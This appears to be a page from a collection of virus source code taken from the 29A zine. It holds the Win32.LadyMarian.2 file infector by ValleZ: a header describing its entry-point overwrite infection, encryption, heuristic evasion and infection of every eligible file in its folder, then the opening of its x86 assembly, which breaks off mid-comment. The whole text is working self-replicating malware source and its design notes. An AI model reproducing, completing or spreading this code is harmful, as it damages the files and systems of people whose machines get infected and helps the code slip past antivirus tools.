29a-7.009

从29A上收集的病毒源码

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
;    Win32.LadyMarian.2
;    Coded By ValleZ.
;    Size:  848h bytes.    
;
;    This is my second virus and probably virus had not optimized code,or bad ideas,or
;    other things,but,as i said,its my second so im excused :P if its a lame virus.
;    Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
;    before(however i dont say it no exist,but i havent seen it). Virus overwrite code 
;    of host,over entry point,after it has copy host code in .reloc.When it returns to host
;    it copy again host to entry point and jmp there.Virus place return to host rutine in 
;    imagebase + 26h, in word oeminfo and 5 * dword reserved.
;    Virus is encrypted with random key.
;    Virus no change flags of code section where it overwrite code of host becoz avs heuristic
;    could detect it. It use VirtualProtect api to set his memory as writable.
;    I want to include some antidebug rutines in virus code but	finally i think better not
;    becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
;    any file becoz it will be more big than reloc.
;    Virus doesnt increase size of file and no change entry point.
;    It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
;    It infects all files in his folder that can be infected.
;    In NT machines only infect if it has necesary permission.
;    In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
;                              Byte 1 of TimeDateStamp in PEheader + 08h.
;                              Flags of .reloc to do it not discarcheable.
;
;
;    Payload: show a message box with no button :P close it with ctrl + alt + supr
;    No more things.
;    This virus is for Lady Mariam,the best girl in the world.
;
;    Thx:
;    Xezaw,my m3nt0r who shows me all i know :)
;    mscorlib,thx for that help that u gave me :) u r a genius :D
;    GriYo,thx u too for ur help too :)
;
;    Sorry,my english is very bad so plz,excuse me.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



.586p
.model flat,stdcall


extrn ExitProcess:proc

				sizeVir = endVir - startVir
				sizecrypt = decryptz - retHost
.data
db 0
.code
start:
startVir:
				push 	ebx   		;registers preserved too
				push 	ecx			
				push 	edx			
				push 	esi
				push 	edi
				push 	ebp
	
				call 	d_offset	;delta offset
d_offset:
				pop   	ebp
				sub 	EBP,offset d_offset
				jmp   	decryptz
retHost:
SEHout: 
	    			mov 	esp,00000000h           			

				pop 	dword ptr fs:[0]  ;SEH return                    
       				pop 	ebp
				pop 	ebp	;ebp too was saved,so we can restore it

				lea 	eax,[ebp + offset baseCalc]
				xor 	al,al			

				xor   	ecx,ecx
				mov   	cx,100h
				add 	eax,ecx
baseCalc:                                          
				sub 	eax,ecx              
				cmp 	word ptr [eax],'ZM'  ;search for image base
				jne 	baseCalc
	
				mov 	esi,[eax + 1ch]    ;dir of reloc
				add 	esi,eax		   ;this header dword is modified 
							   ;when file is infected
				mov 	ecx, [eax+3Ch]				    
				add 	ecx, eax				   
				mov 	dx,[ecx + 8]
				cmp 	dx,'vz'            ;test if this is a infected file,
				jne 	Exit               ;second generation,i no test it with
						           ;or ebp,ebp becoz 
							   ;with this infection method
							   ;sometimes ebp = 0 in 2